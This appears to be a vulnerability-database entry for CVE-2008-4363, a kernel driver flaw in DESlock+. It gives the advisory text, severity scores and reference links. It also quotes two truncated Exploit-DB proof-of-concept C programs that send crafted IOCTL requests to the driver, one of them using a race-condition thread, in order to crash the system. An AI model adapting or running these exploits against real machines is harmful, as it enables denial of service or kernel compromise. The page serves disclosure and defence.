CVE-2008-4363
published 2008-09-30CVE-2008-4363: DLMFENC.sys 1.0.0.28 in DESlock+ 3.2.7 allows local users to cause a denial of service (system crash) or potentially execute arbitrary code via a certain…
PriorityP430high7.2CVSS 2.0
AVLACLAuNCCICAC
EXPLOIT
EPSS
1.18%
63.9th percentile
DLMFENC.sys 1.0.0.28 in DESlock+ 3.2.7 allows local users to cause a denial of service (system crash) or potentially execute arbitrary code via a certain DLMFENC_IOCTL request to \\.\DLKPFSD_Device that overwrites a pointer, probably related to use of the ProbeForRead function when ProbeForWrite was intended.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deslock | deslock | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
DESlock+ < 3.2.7 - 'probe read' Local Kernel Denial of Service (PoC)
exploitdb·2008-09-20
CVE-2008-4363 DESlock+ < 3.2.7 - 'probe read' Local Kernel Denial of Service (PoC)
DESlock+
*
* DESlock+
#include
#include
#define DLMFENC_IOCTL 0x0FA4204C
#define DLMFENC_FLAG 0xC001D00D
#define ARG_SIZE(a) ((a-(sizeof (int)*2))/sizeof (void *))
struct ioctl_req {
int flag;
int req_num;
void *arg[ARG_SIZE(0x20)];
};
static void
xor_mask_req (struct ioctl_req *req)
{
DWORD i, pid;
PCHAR ptr;
pid = GetCurrentProcessId ();
for (i = 0, ptr = (PCHAR) req; i \n"
"http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");
fflush (stdout);
hFile = CreateFileA ("\\\\.\\DLKPFSD_Device", FILE_EXECUTE,
FILE_SHARE_READ|FILE_SHARE_WRITE, NULL,
OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
fprintf (stderr, "* CreateFileA failed, %d\n", hFile);
exit (EXIT_FAILURE);
}
zpage = VirtualAlloc (NULL, 0x1000,
MEM_RESERVE|MEM_COMMIT, PAGE_READONLY);
if (zpage == NULL)
{
f
Exploit-DB
DESlock+ < 3.2.7 - Local Kernel Race Condition Denial of Service (PoC)
exploitdb·2008-09-20
CVE-2008-4363 DESlock+ < 3.2.7 - Local Kernel Race Condition Denial of Service (PoC)
DESlock+
*
* DESlock+
#include
#include
#define DLMFENC_IOCTL 0x0FA4204C
#define DLMFENC_FLAG 0xDEADBEEF
#define ARG_SIZE(a) ((a-(sizeof (int)*2))/sizeof (void *))
struct ioctl_req {
int flag;
int req_num;
void *arg[ARG_SIZE(0x20)];
};
void
hammer_thread (void *zpage)
{
BOOL result;
printf ("* [child] using page @0x%08X\n", zpage);
while (1)
{
result = VirtualFree (zpage, 0, MEM_RELEASE);
if (result == 0)
{
fprintf (stderr, "* [child] VirtualFree failed\n");
exit (EXIT_FAILURE);
}
zpage = VirtualAlloc ((LPVOID) 0x41000000, 0x10000,
MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (zpage == NULL)
{
fprintf (stderr, "* [child] VirtualAlloc failed\n");
exit (EXIT_FAILURE);
}
}
}
int
main (int argc, char **argv)
{
struct ioctl_req req;
HANDLE hFile, hThread;
DWORD rlen, dThread, nT
No writeups or analysis indexed.
http://digit-labs.org/files/exploits/deslock-probe-read.chttp://secunia.com/advisories/31921http://securityreason.com/securityalert/4342http://www.vupen.com/english/advisories/2008/2638https://www.exploit-db.com/exploits/6498http://digit-labs.org/files/exploits/deslock-probe-read.chttp://secunia.com/advisories/31921http://securityreason.com/securityalert/4342http://www.vupen.com/english/advisories/2008/2638https://www.exploit-db.com/exploits/6498
2008-09-30
Published